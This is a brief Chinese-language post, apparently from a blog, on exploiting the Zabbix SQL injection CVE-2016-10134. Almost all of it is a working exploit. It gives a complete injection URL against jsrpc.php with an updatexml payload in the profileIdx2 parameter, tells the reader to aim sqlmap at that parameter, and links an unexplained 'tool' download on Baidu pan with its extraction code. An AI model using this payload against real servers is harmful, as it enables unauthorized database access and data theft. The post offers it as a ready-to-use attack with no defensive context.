zabbix漏洞利用 CVE-2016-10134
利用方法:
在url后面添加如下内容:
jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
sqlmap指定参数 -p profileIdx2
工具
链接:https://pan.baidu.com/s/1aHVagM7lP_NqS7827BgMTw
提取码:m4nl

浙公网安备 33010602011771号